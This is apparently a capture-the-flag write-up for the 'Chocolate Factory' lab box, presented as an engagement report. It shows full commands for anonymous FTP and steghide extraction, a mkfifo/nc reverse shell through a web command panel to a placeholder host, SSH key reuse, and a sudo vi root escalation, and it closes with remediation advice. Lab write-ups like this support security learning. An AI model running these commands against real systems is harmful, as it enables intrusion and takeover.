FTP stego, web panel RCE, and sudo vi to Fernet root
Intermediate themed engagement: anonymous FTP stego and a command panel yielded a shell; charlie’s SSH key from teleport; sudo vi escalated to root; a Fernet key from an earlier binary decrypted the root artifact.
- Case files
- FTP stego, web panel RCE, and sudo vi to Fernet root
Anonymous FTP delivered a stego image. An unauthenticated command panel on home.php gave RCE; validate.php and teleport enabled SSH as charlie; sudo vi and a recovered Fernet key finished root.
Anonymous FTP and steghide fed recon. home.php executed a mkfifo reverse shell.
validate.php held charlie’s password; teleport provided the private key for SSH.
NOPASSWD vi spawned a root shell. Fernet key from the panel phase decrypted root.py.
Engagement summary
Anonymous FTP delivered a stego image. An unauthenticated command panel on home.php gave RCE; validate.php and teleport enabled SSH as charlie; sudo vi and a recovered Fernet key finished root.
Chocolate Factory (10.10.14.239) exposed vsftpd with anonymous read of gum_room.jpg. steghide (empty passphrase) extracted credential material. Directory brute force found /home.php — a command execution panel — and login artifacts. From the panel we recovered a Fernet key via strings on a local binary and opened a reverse shell. validate.php disclosed charlie / cn7824; /home/charlie/teleport held an SSH private key. As charlie, sudo -l allowed /usr/bin/vi without a password; GTFOBins vi spawned root. Decrypting /root/root.py with the earlier Fernet key recovered the final artifact.
Business impact
Anonymous FTP plus an unauthenticated command panel is intentional RCE. sudo vi without password is root by design. Remove debug panels from production, disable anonymous FTP, and never grant interactive editors via sudo.
FTP stego and command panel RCE
Anonymous FTP and steghide fed recon. home.php executed a mkfifo reverse shell.
OPERATOR · FTP / STEGO
savvy@lab:~$ nmap -sV 10.10.14.239
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1
80/tcp open http Apache httpd 2.4.29
savvy@lab:~$ ftp 10.10.14.239
Name: anonymous
ftp> get gum_room.jpg
savvy@lab:~$ steghide extract -sf gum_room.jpg -p ''
wrote extracted data to b64.txt
OPERATOR · PANEL RCE
savvy@lab:~$ dirsearch -u http://10.10.14.239
/home.php (Status: 200)
savvy@lab:~$ nc -lvnp 4444
# home.php cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc OPERATOR 4444 >/tmp/f
savvy@lab:/var/www/html$
savvy@lab:~$ strings key_binary | grep -E 'Fernet|VkgXh'
-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=
Credentials and SSH as charlie
validate.php held charlie’s password; teleport provided the private key for SSH.
OPERATOR · SSH
savvy@lab:~$ grep -E 'user|pass' validate.php
charlie / cn7824
savvy@lab:~$ cp /home/charlie/teleport id_rsa && chmod 600 id_rsa
savvy@lab:~$ ssh charlie@10.10.14.239 -i id_rsa
savvy@lab:~$
sudo vi and Fernet decrypt
NOPASSWD vi spawned a root shell. Fernet key from the panel phase decrypted root.py.
OPERATOR · ROOT
savvy@lab:~$ sudo -l
(ALL : !root) NOPASSWD: /usr/bin/vi
savvy@lab:~$ sudo vi -c ':!/bin/sh' /dev/null
root@lab:~# python3 /root/root.py
# decrypt with Fernet key recovered earlier from strings
root artifact recovered
Remediation
Disable anonymous FTP and remove stego-bearing assets from shares. Delete command-execution panels. Replace sudo vi with least-privilege tooling; store decryption keys outside world-readable binaries.